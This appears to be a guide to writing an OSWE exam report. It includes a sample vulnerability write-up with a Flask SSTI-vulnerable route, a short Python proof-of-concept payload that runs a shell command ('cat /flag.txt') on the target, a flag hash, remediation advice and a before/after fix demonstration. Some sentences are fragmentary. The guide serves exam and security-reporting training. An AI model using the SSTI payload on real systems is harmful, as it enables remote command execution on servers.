OSWE Exam Report

If you get a 100% on the hack but a 60% on the report, your overall score is ~80%, which is often a fail.

In the real world, a client pays you to find vulnerabilities. But if you cannot explain to the development team exactly how to trigger the bug and exactly where to fix it in the source code, your hack is useless.

Forgetting to include the vulnerable sections of the source code that you analyzed.

If you need help structuring a ?

<pre><code class="language-python">name = request.args.get('name')
# User input is interpolated into the template source itself
return render_template_string(f"<h1>Hello {name}</h1>")
</code></pre>
<p><strong>PoC</strong>:</p>
<pre><code class="language-python">import requests

payload = "''.__class__.__mro__[2].__subclasses__()[407]('cat /flag.txt', shell=True, stdout=-1).communicate()"
requests.get(f"http://target/profile?name={payload}")
</code></pre>
<p><strong>Exploit script</strong>: <code>exploit_ssti.py</code> (attached)
<strong>Screenshot</strong>: Fig1 – command output showing flag</p>
<p>[Repeat for second vulnerability chain on other target]</p>
<h2>Flags</h2>
<ul>
<li><code>proof.txt</code> on app1: <code>e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855</code></li>
<li>Screenshot of shell with <code>id</code> and <code>cat proof.txt</code></li>
</ul>
<h2>Remediation</h2>
<p>Use <code>render_template()</code> with user-controlled variables passed as context, never string concatenation with <code>render_template_string()</code>.</p>
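The Remediation item in the sample report above, shown as a before/after pair that a report could include to prove the fix. This is an added example, not code from the original page or from any exam target; the `/profile-fixed` route, the `profile.html` template, the `render_probe` helper and the arithmetic probe are assumptions made for illustration.

```python
import os
import tempfile

from flask import Flask, render_template, render_template_string, request

# Hypothetical template directory holding the static template for the fixed route.
TEMPLATE_DIR = tempfile.mkdtemp()
with open(os.path.join(TEMPLATE_DIR, "profile.html"), "w") as fh:
    fh.write("<h1>Hello {{ name }}</h1>")

app = Flask(__name__, template_folder=TEMPLATE_DIR)


@app.route("/profile")
def profile_vulnerable():
    # Before: user input becomes part of the template source and is evaluated.
    name = request.args.get("name", "")
    return render_template_string(f"<h1>Hello {name}</h1>")


@app.route("/profile-fixed")
def profile_fixed():
    # After: the template source is static; input is only a context value,
    # so it is never parsed as a template and is HTML-escaped on output.
    name = request.args.get("name", "")
    return render_template("profile.html", name=name)


def render_probe(path, value):
    """Send `value` as ?name= to `path` through Flask's test client; return the body."""
    with app.test_client() as client:
        return client.get(path, query_string={"name": value}).get_data(as_text=True)


if __name__ == "__main__":
    probe = "{{7*7}}<b>"  # constructed, harmless probe: arithmetic plus a tag
    print("vulnerable:", render_probe("/profile", probe))
    print("fixed:     ", render_probe("/profile-fixed", probe))
```

Running the same probe against both routes gives the development team a regression check: the expression must come back unevaluated and the tag escaped.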

Before finalizing your report, reset your exam lab environment through the control panel. Run your automated exploit script against the freshly reverted machine. If it fails to achieve RCE automatically, rewrite and debug the script until it functions flawlessly on a clean target.

You must create a dedicated section for each target application. For every target, break your documentation down into these five subsections:

A. Vulnerability Identification (Code Analysis)

This is where you prove your source code review skills.